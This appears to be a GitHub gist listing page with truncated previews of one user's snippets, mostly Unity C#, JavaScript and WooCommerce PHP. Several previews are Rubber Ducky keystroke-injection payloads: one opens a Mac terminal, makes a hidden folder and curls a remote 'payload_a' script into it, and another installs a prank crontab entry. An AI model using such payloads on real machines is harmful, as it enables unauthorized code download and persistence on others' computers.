View EventManager.cs
using System; | |
using System.Collections; | |
using System.Collections.Generic; | |
using UnityEngine; | |
public class EventManager : MonoBehaviour | |
{ | |
static public EventManager instance; | |
private Dictionary<string, Action> _eventDelegates; | |
private Dictionary<string, Action<dynamic>> _eventDelegatesWithArg; |
View CanPickupObject.cs
using System.Collections; | |
using System.Collections.Generic; | |
using UnityEngine; | |
public class CanPickupObjects : MonoBehaviour | |
{ | |
public LayerMask clickableLayer; | |
public GameObject currentlyHolding; | |
public GameObject pickupDestination; | |
private BoxCollider thisCollider; |
View RubberDuckyPayload
DEFAULTDELAY 250 | |
DELAY 500 | |
GUI SPACE | |
STRING terminal.app | |
ENTER | |
DELAY 100 | |
STRING mkdir $HOME/.localrc/ | |
ENTER | |
DELAY 10 | |
STRING curl http://website.com/payload_a -o $HOME/.localrc/payload_a.sh |
View ArrowFunctions.js
/** | |
* Arrow functions | |
*/ | |
var names = ['John', 'Jane', 'Jill']; | |
// Old | |
names.map(function(name) { | |
console.log(name); | |
}); |
View payload.txt
DELAY 1000 | |
GUI r | |
DELAY 500 | |
STRING notepad.exe | |
ENTER | |
DELAY 500 | |
STRING James says hello! |
View payload.txt
DEFAULTDELAY 250 | |
DELAY 750 | |
GUI SPACE | |
STRING terminal.app | |
ENTER | |
DELAY 100 | |
STRING echo "*/2 * * * * osascript -e 'set volume 7' && open 'https://www.youtube.com/watch?v=dQw4w9WgXcQ'" | crontab - | |
ENTER | |
DELAY 100 | |
GUI q |
View MyCustomProductsController.php
<?php | |
class MyCustomProductsController extends WC_REST_Products_Controller | |
{ | |
public function register_routes() | |
{ | |
register_rest_route( $this->namespace, '/' . $this->rest_base, array( | |
array( | |
'methods' => WP_REST_Server::READABLE, | |
'callback' => array( $this, 'get_items' ), | |
'permission_callback' => array( $this, 'get_items_permissions_check' ), |
View equate-height.js
$ = require('jquery'); | |
_ = require('lodash'); | |
Vue.directive('equate-height', { | |
inserted: function (el, binding) { | |
this.equateHeight = new EquateHeight(el, binding.value); | |
}, | |
componentUpdated: function() { | |
this.equateHeight.setHeight(); | |
}, |
View ainsley.exe.js
var ainsley = { | |
exe: function() { | |
var egg = document.createElement('img'); | |
egg.src = 'http://i0.kym-cdn.com/photos/images/facebook/000/114/193/1298574546091.jpg'; | |
egg.setAttribute('style', 'position: fixed; top: 50%; left: 50%; z-index: 999999; transform: translate(-50%, -50%);'); | |
document.body.appendChild(egg); | |
setTimeout(function() { | |
document.body.removeChild(egg); | |
}, 500); | |
} |
View Demo.cs
using UnityEngine; | |
using System; | |
public class Demo : MonoBehaviour { | |
void Start() { | |
new FB_Query("/me", callback); | |
} | |
public void callback(SimpleJSON.JSONNode result) { |
NewerOlder